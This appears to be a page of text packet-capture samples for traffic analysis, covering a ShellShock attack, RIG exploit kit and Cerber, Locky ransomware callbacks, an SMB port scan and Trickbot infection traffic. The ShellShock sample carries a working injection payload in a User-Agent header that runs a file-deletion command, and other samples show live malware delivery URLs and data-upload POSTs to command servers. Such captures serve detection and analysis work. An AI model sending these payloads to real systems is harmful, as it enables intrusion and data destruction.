Text Example

ShellShock Attack PCAP file Download Traffic Analysis Sample

2017-07-26 16:42:16.277036 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 15800207:15800243, ack 1402349435, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 36: HTTP: GET /cgi-bin/.svn/entries HTTP/1.1
E..X.+@.>.|….x.O…..P….S.'{…s…….
Fu..z.<.GET /cgi-bin/.svn/entries HTTP/1.1

2017-07-26 16:42:16.277047 IP 130.253.1.120.52744 > 204.79.197.200.80: Flags [P.], seq 36:148, ack 1, win 115, options [nop,nop,TS val 1182121665 ecr 2059156643], length 112: HTTP
E….,@.>.|….x.O…..P….S.'{…s.…..
Fu..z.<.Host: db75d9a4f3c95d8a0adffb672c196e96.du.edu
User-Agent: () { :; }; /bin/rm /var/www/default/CVE-2014-6271

2017-07-26 16:42:16.277082 IP 61.7.186.197.5507 > 130.253.185.203.23: Flags [S], seq 0, win 65535, length 0
E..(:(….W.=……………….P…e…
2017-07-26 16:42:16.277466 IP 60.196.157.234.47651 > 130.253.130.165.1900: UDP, length 94
E..z..@.0.j”<……..#.l.f..M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
MAN: ssdp:discover
MX: 10
ST: ssdp:all

.
2017-07-26 16:42:16.282511 IP 91.223.133.13.42880 > 130.253.95.133.3404: Flags [S], seq 670678803, win 1024, length 0
E(.(…….^[…..….L’…….P…L… 2017-07-26 16:42:16.282575 IP 91.223.133.13.42880 > 130.253.95.125.3404: Flags [S], seq 2388976086, win 1024, length 0 E(.(……RY[…..}…L.d……P….s..
2017-07-26 16:42:16.282695 IP 213.49.124.141.50470 > 130.253.126.22.81: Flags [S], seq 3098327735, win 14600, options [mss 1452,sackOK,TS val 9607180 ecr 0,nop,wscale 1], length 0
E .<.4@.5….1|…~..&.Q……….9………… ………… 2017-07-26 16:42:16.283075 IP 74.94.22.81.64396 > 130.253.68.156.23: Flags [S], seq 2197636252, win 40676, length 0
E .(.p..6…J^.Q..D…….D…..P…%x..
2017-07-26 16:42:16.287606 IP 74.109.122.3.37142 > 130.253.119.199.23: Flags [S], seq 2197649351, win 2461, options [mss 1460], length 0
E..,.8..5..Jmz…w…….w…..`. .Cb…… 2017-07-26 16:42:16.288426 IP 114.230.11.31.35388 > 130.253.49.6.23: Flags [S], seq 2197631238, win 38956, length 0 E..(….1…r…..1..<….1…..P..,.V.. 2017-07-26 16:42:16.291979 IP 119.193.140.179.2420 > 130.253.232.246.22: Flags [S], seq 2197678326, win 1067, length 0 E..(….0…w……. t……….P..+…. 2017-07-26 16:42:16.293510 IP 77.72.82.14.42775 > 130.253.225.5.3344: Flags [S], seq 1899387472, win 1024, length 0 E..(.E…..1MHR………q6ZP….P…(… 2017-07-26 16:42:16.294581 IP 77.72.82.14.42775 > 130.253.57.86.3307: Flags [S], seq 2659645233, win 1024, length 0 E..(……..MHR…9V…….1….P….~.. 2017-07-26 16:42:16.296551 IP 123.188.246.124.42492 > 130.253.123.118.23: Flags [S], seq 2197650294, win 48868, length 0 E..(….1.*.{..|..{v……{v….P……. 2017-07-26 16:42:16.297055 IP 115.148.242.216.17414 > 130.253.215.62.29917: Flags [S], seq 4072809910, win 65535, options [mss 1452,nop,wscale 2,nop,nop,sackOK], length 0 E..4,^@….s……>D.t…%…………………….
2017-07-26 16:42:16.300902 IP 185.195.201.148.32512 > 130.253.123.83.1900: Flags [S], seq 0, win 65535, length 0
E(.(.a@.4………{S…l……..P…….
2017-07-26 16:42:16.301542 IP 218.76.253.134.30694 > 130.253.215.62.30208: UDP, length 31
E..;.S..p..P.L…..>w.v..”l……0
……a…………….

RIG Exploit Kit EK Delivers Cerber Ransomware Malware PCAP file download traffic sample

2016-10-18 14:40:36.304404 IP 10.10.18.102.49185 > 195.133.201.132.80: Flags [P.], seq 1:477, ack 1, win 258, length 476: HTTP: GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
E….O@…N+

.f…..!.P0.X.]..MP…….GET /?x3qJc7iVLB3LDIU=l3SKfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJMwNHqpuRQuA60Q6jyLlFdM0ilROKvWBSy7sUUg4T6BgY0Q HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Referer: http://www.basket-brabant.be/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: add.jamesthorpebourbon.com
Connection: Keep-Alive

2016-10-18 14:40:36.504124 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], ack 477, win 237, length 0
E..(.T@.5…….

.f.P.!]..M0.Z.P…E+..
2016-10-18 14:40:37.014717 IP 195.133.201.132.80 > 10.10.18.102.49185: Flags [.], seq 1:1322, ack 477, win 237, length 1321: HTTP: HTTP/1.1 200 OK
E..Q.U@.5…….

.f.P.!]..M0.Z.P…….HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Tue, 18 Oct 2016 18:40:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 18876
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2016-10-18 14:41:31.393471 IP 10.10.18.102.54101 > 31.184.234.169.6892: UDP, length 9
E..%.^……

.f…..U…..Xhi008c1c4………
2016-10-18 14:41:31.393481 IP 10.10.18.102.54101 > 31.184.234.170.6892: UDP, length 9
E..%._……

.f…..U…..Whi008c1c4………
2016-10-18 14:41:31.393494 IP 10.10.18.102.54101 > 31.184.234.171.6892: UDP, length 9
E..%.`……

.f…..U…..Vhi008c1c4………
2016-10-18 14:41:31.393504 IP 10.10.18.102.54101 > 31.184.234.172.6892: UDP, length 9
E..%.a……

.f…..U…..Uhi008c1c4………
2016-10-18 14:41:31.393514 IP 10.10.18.102.54101 > 31.184.234.173.6892: UDP, length 9
E..%.b……

.f…..U…..Thi008c1c4………
2016-10-18 14:41:31.393524 IP 10.10.18.102.54101 > 31.184.234.174.6892: UDP, length 9
E..%.c……

.f…..U…..Shi008c1c4………
2016-10-18 14:41:31.393534 IP 10.10.18.102.54101 > 31.184.234.175.6892: UDP, length 9
E..%.d……

.f…..U…..Rhi008c1c4………
2016-10-18 14:41:31.393544 IP 10.10.18.102.54101 > 31.184.234.176.6892: UDP, length 9
E..%.e……

.f…..U…..Qhi008c1c4………
2016-10-18 14:41:31.393554 IP 10.10.18.102.54101 > 31.184.234.177.6892: UDP, length 9
E..%.f……

.f…..U…..Phi008c1c4………
2016-10-18 14:41:31.393565 IP 10.10.18.102.54101 > 31.184.234.178.6892: UDP, length 9
E..%.g……

.f…..U…..Ohi008c1c4………
2016-10-18 14:41:31.393575 IP 10.10.18.102.54101 > 31.184.234.179.6892: UDP, length 9
E..%.h……

.f…..U…..Nhi008c1c4………
2016-10-18 14:41:31.393585 IP 10.10.18.102.54101 > 31.184.234.180.6892: UDP, length 9
E..%.i……

.f…..U…..Mhi008c1c4………
2016-10-18 14:41:31.393598 IP 10.10.18.102.54101 > 31.184.234.181.6892: UDP, length 9
E..%.j……

.f…..U…..Lhi008c1c4………
2016-10-18 14:41:31.393608 IP 10.10.18.102.54101 > 31.184.234.182.6892: UDP, length 9
E..%.k……

.f…..U…..Khi008c1c4………
2016-10-18 14:41:31.393618 IP 10.10.18.102.54101 > 31.184.234.183.6892: UDP, length 9
E..%.l…..}

.f…..U…..Jhi008c1c4………
2016-10-18 14:41:31.393628 IP 10.10.18.102.54101 > 31.184.234.184.6892: UDP, length 9
E..%.m…..{

Locky Ransomware Variant Malware PCAP File Download Traffic Sample

2016-09-26 15:15:14.233356 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1258:1735, ack 727, win 63514, length 477: HTTP: POST /apache_handler.php HTTP/1.1
E….{@….K
.i…….P&p…n^.P…8…POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://5.196.200.247/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 5.196.200.247
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.233380 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 1735, win 64240, length 0
E..(…………
.i.P…n^.&p..P…[………
2016-09-26 15:15:14.233382 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [P.], seq 1735:2515, ack 727, win 63514, length 780: HTTP
E..4.|@…..
.i…….P&p…n^.P….]..tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.233384 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [.], ack 2515, win 64240, length 0
E..(…………
.i.P…n^.&p..P…X………
2016-09-26 15:15:14.390578 IP 5.196.200.247.80 > 10.9.26.105.49163: Flags [P.], seq 727:1453, ack 2515, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E……………
.i.P…n^.&p..P…Q…HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:28 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.390873 IP 10.9.26.105.49163 > 5.196.200.247.80: Flags [.], ack 1453, win 62788, length 0
E..(.}@….&
.i…….P&p…na.P..D[………
2016-09-26 15:15:14.391726 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1260:1739, ack 727, win 63514, length 479: HTTP: POST /apache_handler.php HTTP/1.1
E….~@….c
.i>……PE…}td.P….Q..POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://62.173.154.240/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 62.173.154.240
Content-Length: 780
Connection: Keep-Alive

2016-09-26 15:15:14.391855 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [P.], seq 1739:2519, ack 727, win 63514, length 780: HTTP
E..4..@….5
.i>……PE…}td.P…&…tRkhMmAN=%85%F3%F5_rh%8A%A6d%F2%88%17sk%5E%11%B8V%DC%22%27%B1j%01%1A%99%14%EEL%B8k%83%03%5D%CC%0Aa%27%08%90%B1o%80W%BF%C5%00%A5b&TKzJjd=%02%BE%19%DE%C4%CD%89%E7%AC%07%86%2Ak%0FX%28%8F&omNcncA=%9B%95x%FD%29%B0o%2F%5E%0Ax%F7%CF25%7Bl%EFI%E9%CE%FEo%A5%D8%B5%EC%EB%FE%21%F4%C1%BF%E0%B7%9B%8C%D4D%B5%17%11%CA%23&jZvk=%F6%13%09%C0%5D%90%D4u%93%E2%A0%89m%D9%C22u%FA%AA%B08%D2b%9C%1B%28zIG%CF%FBT%BA%40%99%EE%D3%A3.E7%0A%DED&NQkDpPm=%F3iMJ%BA%C8%CC%090%5B%A2%C4%EE%C6%04W%1B%D4%E5%9B6%26p%B2R%0E%15%CD%A3%D9%8F%7Dt%2BB%40B%B2%06%B1%12%13%19%A6E%E5%0F%8D&wpBRujHj=%90Ay%3D%F8%A8%DF%3D%D2%B8_P%F2%9F%A98%16%2C%C8d%B0%FE&lDJDaBsG=V%A8h%A2B%19%DC%FFg%1B%A0%B3%C5o%AC%08%E6%3B%0B%BE%26%D4y%EB%0FK%D3%29RC&Qdg=%94n%0F%82%A5C%7F%2F%8D%884%7F%E1f%99G%B5Q%7B%7DV%21%A52%FD%E2%99g&EJQKjhN=%21%9E%7D
2016-09-26 15:15:14.391863 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 1739, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.391865 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [.], ack 2519, win 64240, length 0
E..(……..>…
.i.P..}td.E…P………….
2016-09-26 15:15:14.575076 IP 62.173.154.240.80 > 10.9.26.105.49164: Flags [P.], seq 727:1453, ack 2519, win 64240, length 726: HTTP: HTTP/1.1 404 Not Found
E………..>…
.i.P..}td.E…P…….HTTP/1.1 404 Not Found
Server: nginx/1.10.1
Date: Mon, 26 Sep 2016 19:15:14 GMT
Content-Type: text/html
Content-Length: 571
Connection: keep-alive

404 Not Found

404 Not Found


nginx/1.10.1

2016-09-26 15:15:14.575385 IP 10.9.26.105.49164 > 62.173.154.240.80: Flags [.], ack 1453, win 62788, length 0
E..(..@….@
.i>……PE…}tgnP..D……….
2016-09-26 15:15:14.748030 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:17.758523 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [S], seq 3107914475, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
.ih….$.P.?…….. .p……………
2016-09-26 15:15:21.819893 IP 104.239.213.7.80 > 10.9.26.105.49188: Flags [S.], seq 3863520333, ack 3107914476, win 64240, options [mss 1460], length 0
E..,……Gbh…
.i.P.$.H.M.?..`…3………
2016-09-26 15:15:21.820158 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [.], ack 1, win 64240, length 0
E..(..@…..
.ih….$.P.?…H.NP…KC……..
2016-09-26 15:15:21.820289 IP 10.9.26.105.49188 > 104.239.213.7.80: Flags [P.], seq 1:476, ack 1, win 64240, length 475: HTTP: POST /apache_handler.php HTTP/1.1
E…..@…..
.ih….$.P.?…H.NP…….POST /apache_handler.php HTTP/1.1
Accept: /
Accept-Language: en-us
Referer: http://cifkvluxh.su/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: cifkvluxh.su
Content-Length: 780
Connection: Keep-Alive

SMB NMAP Portscan Port scanning PCAP File Download Traffic Sample Analysis

2017-06-20 14:09:12.664927 IP 10.101.22.128.49739 > 221.184.213.149.445: Flags [S], seq 3893475975, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….

e…….K………… ..;…………..
2017-06-20 14:09:12.758627 IP 10.101.22.128.49741 > 212.104.117.73.445: Flags [S], seq 1202043706, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…w.
e…huI.M..G..:…… ……………..
2017-06-20 14:09:12.771825 IP 10.72.158.57.59199 > 10.101.21.107.445: Flags [S], seq 436800387, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4?.@.~…
H.9
e.k.?… …….. .x<………….. 2017-06-20 14:09:12.785013 IP 172.20.31.74.64831 > 10.101.20.47.445: Flags [S], seq 347664739, win 8192, options [mss 1380,nop,wscale 2,sackOK,TS val 51473388 ecr 0], length 0
E..<..@.q. ….J e./.?…..c…… ..L…..d……. ..k….. 2017-06-20 14:09:12.820839 IP 10.101.22.128.49743 > 118.239.76.174.445: Flags [S], seq 502529660, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e..v.L..O…..|…… ……………..
2017-06-20 14:09:12.867372 IP 10.27.117.40.51918 > 10.101.21.40.445: Flags [S], seq 252935156, win 8192, options [mss 1380,nop,wscale 2,nop,nop,sackOK], length 0
E..4.@.m... .u( e.(......{....... .Y......d........ 2017-06-20 14:09:12.867686 IP 10.101.22.128.49744 > 130.69.49.167.445: Flags [S], seq 839731710, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4..@....i e...E1..P..2.I....... .:&.............. 2017-06-20 14:09:12.947781 IP 10.102.169.67.57901 > 10.101.21.54.445: Flags [S], seq 2258261251, win 5840, options [mss 1460,sackOK,TS val 2207468264 ecr 0,nop,wscale 2,unknown-76 0x0101644405e50005,unknown-76 0x0c05,nop,eol], length 0 E..L..@.7.^d f.C e.6.-....U.................... ..J.........L ..dD....L..... 2017-06-20 14:09:12.958471 IP 172.20.147.59.58165 > 10.101.20.79.445: Flags [S], seq 721417024, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0 E..44.@.p.x....; e.O.5..*..@...... ................. 2017-06-20 14:09:12.992756 IP 10.101.22.128.49746 > 152.222.186.96.445: Flags [S], seq 464388263, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0 E..4..@...n. e......R………… ……………..
2017-06-20 14:09:13.039562 IP 10.101.22.128.49748 > 29.89.169.211.445: Flags [S], seq 855875173, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….&
e…Y…T..3..e…… ……………..
2017-06-20 14:09:13.070724 IP 10.101.22.128.49749 > 152.100.211.153.445: Flags [S], seq 1583303698, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…US
e…d…U..^_L……. .S……………
2017-06-20 14:09:13.073884 IP 10.89.37.211.53044 > 10.101.21.118.445: Flags [S], seq 801397140, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4E,@.v.o.
Y%.
e.v.4../.Y……. ……………..
2017-06-20 14:09:13.226796 IP 10.101.22.128.49752 > 187.236.46.149.445: Flags [S], seq 21748602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e…….X…K.z…… ……………..
2017-06-20 14:09:13.258021 IP 10.101.22.128.49753 > 216.57.215.72.445: Flags [S], seq 4161335896, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…..
e…9.H.Y…..X…… ..0…………..
2017-06-20 14:09:13.296307 IP 10.102.169.129.51237 > 10.101.20.177.445: Flags [S], seq 973127344, win 5840, options [mss 1460,sackOK,TS val 2207468613 ecr 0,nop,wscale 2,unknown-76 0x0101644405e50005,unknown-76 0x0c05,nop,eol], length
0
E..L..@.7.y.
f..
e…%..:………..{x………
..LE……..L
..dD….L…..
2017-06-20 14:09:13.320605 IP 10.101.22.128.49755 > 202.253.124.66.445: Flags [S], seq 2143311680, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…z.
e….|B.[….W@…… .K……………
2017-06-20 14:09:13.461584 IP 10.101.22.128.49757 > 56.71.64.115.445: Flags [S], seq 868905440, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0

Malspam Campaign Delivers Trickbot Malware PCAP file Download Traffic Sample

2018-06-29 12:54:14.644477 IP 172.16.1.102.49198 > 134.119.189.10.80: Flags [P.], seq 1:76, ack 1, win 64240, length 75: HTTP: GET /lop.bin HTTP/1.1
E..s..@……..f.w.
…P\WQ..M^PP…-…GET /lop.bin HTTP/1.1
Host: srienterprises.net
Connection: Keep-Alive

2018-06-29 12:54:14.644487 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [.], ack 76, win 64240, length 0
E..(………w.
…f.P…M^P\WQ.P…l………
2018-06-29 12:54:14.844854 IP 134.119.189.10.80 > 172.16.1.102.49198: Flags [P.], seq 1:2741, ack 76, win 64240, length 2740: HTTP: HTTP/1.1 200 OK
E.

…….$..w.

2018-06-29 12:55:45.742934 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [.], ack 1, win 64240, length 0
E..(..@….H…f.#.@.3.P.Fr.X.1.P….o……..
2018-06-29 12:55:45.743083 IP 172.16.1.102.49203 > 192.35.177.64.80: Flags [P.], seq 1:140, ack 1, win 64240, length 139: HTTP: GET /roots/dstrootcax3.p7c HTTP/1.1
E…..@……..f.#.@.3.P.Fr.X.1.P…5…GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: /
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com

2018-06-29 12:55:45.743140 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [.], ack 140, win 64240, length 0
E..(.w…..~.#.@…f.P.3X.1..FsLP………….
2018-06-29 12:55:45.804452 IP 192.35.177.64.80 > 172.16.1.102.49203: Flags [P.], seq 1:1219, ack 140, win 64240, length 1218: HTTP: HTTP/1.1 200 OK

E….x…….#.@…f.P.3X.1..FsLP…\W..HTTP/1.1 200 OK

2018-06-29 12:55:46.005784 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [.], ack 1, win 64240, length 0
E..(..@…w….f…..4.P.UsR.L.4P…h………
2018-06-29 12:55:46.005788 IP 172.16.1.102.49204 > 8.250.199.254.80: Flags [P.], seq 1:218, ack 1, win 64240, length 217: HTTP: GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
E…..@…v….f…..4.P.UsR.L.4P…….GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86400
Connection: Keep-Alive
Accept: /
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

2018-06-29 12:55:46.005788 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [.], ack 218, win 64240, length 0
E..(.|………….f.P.4.L.4.Ut+P…g………

2018-06-29 12:55:46.064711 IP 8.250.199.254.80 > 172.16.1.102.49204: Flags [P.], seq 1:1371, ack 218, win 64240, length 1370: HTTP: HTTP/1.1 200 OK

2018-06-29 12:57:48.184025 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
E..( =@….p…fU….8.P#.k9.Q,.P………….
2018-06-29 12:57:48.184275 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 1:148, ack 1, win 64240, length 147: HTTP: GET /table.png HTTP/1.1
E… >@……..fU….8.P#.k9.Q,.P…….GET /table.png HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: WinHTTP loader/1.0
Host: 85.143.220.29

2018-06-29 12:57:48.184329 IP 85.143.220.29.80 > 172.16.1.102.49208: Flags [.], ack 148, win 64240, length 0
E..()+….2.U……f.P.8.Q,.#.k.P….*……..

2018-06-29 12:57:48.278295 IP 172.16.1.102.138 > 172.16.1.255.138: NBT UDP PACKET(138)

2018-06-29 12:58:08.163467 IP 172.16.1.8.445 > 172.16.1.102.49476: Flags [R.], seq 28547, ack 540206, win 0, length 0
E..(B.@…]……..f…Ds7T.f ..P………….
2018-06-29 12:58:08.854164 IP 172.16.1.102.49208 > 85.143.220.29.80: Flags [P.], seq 148:295, ack 385267, win 64240, length 147: HTTP: GET /toler.png HTTP/1.1
E….N@……..fU….8.P#.k..W..P…./..GET /toler.png HTTP/1.1
Cache-Control: no-cache

2018-06-29 12:58:08.854312 IP 172.16.1.102.49205 > 185.231.154.104.443: Flags [P.], seq 35002:35407, ack 104145, win 62791, length 405

E..(..@….H…f.|…J....M....P...Q......... 2018-06-29 12:58:17.086787 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [P.], seq 1:231, ack 1, win 64240, length 230 E.....@....a...f.|...J....M….P….!..POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/90 HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 4701
Cache-Control: no-cache

2018-06-29 12:58:17.086832 IP 188.124.167.132.8082 > 172.16.1.102.49482: Flags [.], ack 231, win 64240, length 0
E..(+……..|…..f…J….`..3P…P+……..

2018-06-29 12:58:17.086835 IP 172.16.1.102.49482 > 188.124.167.132.8082: Flags [.], seq 231:1691, ack 1, win 64240, length 1460

2018-06-29 12:58:26.662877 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [.], ack 1, win 64240, length 0
E..(.z@… 3…fU….x.Py….Q..P………….
2018-06-29 12:58:26.663148 IP 172.16.1.102.49528 > 85.143.220.29.80: Flags [P.], seq 1:75, ack 1, win 64240, length 74: HTTP: GET /worming.png HTTP/1.1
E..r.{@……..fU….x.Py….Q..P…w…GET /worming.png HTTP/1.1
Connection: Keep-Alive
Host: 85.143.220.29

2018-06-29 13:00:42.880606 IP 172.16.1.102.49532 > 188.124.167.132.8082: Flags [P.], seq 1:312, ack 1, win 64240, length 311
E.._..@……..f.|…|..c.~….;P…-a..POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/81/ HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———WMGTRKAJOYFBWHYO
Content-Length: 274

2018-06-29 13:00:42.880689 IP 188.124.167.132.8082 > 172.16.1.102.49532: Flags [.], ack 312, win 64240, length 0

E..(………|…..f…|…;c…P…-………

E..(..@……..f.|…}…W.Z….P…h………
2018-06-29 13:00:43.803141 IP 172.16.1.102.49533 > 188.124.167.132.8082: Flags [P.], seq 1:313, ack 1, win 64240, length 312
E..`..@….v…f.|…}…W.Z….P…I…POST /ser0629/NARWHAL-PC_W617601.35B9952F626E69947B9AEE4D9CE9809E/82/ HTTP/1.1
Accept: /
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 188.124.167.132
Connection: close
Content-Type: multipart/form-data; boundary=———OUYLMXQCWCVFOBNR
Content-Length: 2229